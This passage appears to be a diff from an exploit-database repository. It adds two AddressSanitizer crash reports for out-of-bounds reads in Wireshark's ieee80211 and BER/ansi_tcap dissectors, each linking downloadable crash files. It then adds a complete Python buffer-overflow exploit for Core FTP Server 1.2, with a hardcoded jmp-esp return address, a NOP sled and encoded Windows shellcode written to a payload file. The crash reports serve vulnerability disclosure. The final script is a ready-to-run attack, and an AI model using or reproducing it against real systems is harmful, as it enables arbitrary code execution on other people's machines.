#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip

141
platforms/multiple/dos/39484.txt Executable file
View file

@ -0,0 +1,141 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip

View file

@ -0,0 +1,77 @@
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
[-] 'Log filename(include path)' field is no limit to the length and does not check the length
[-] Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
f.write(payload)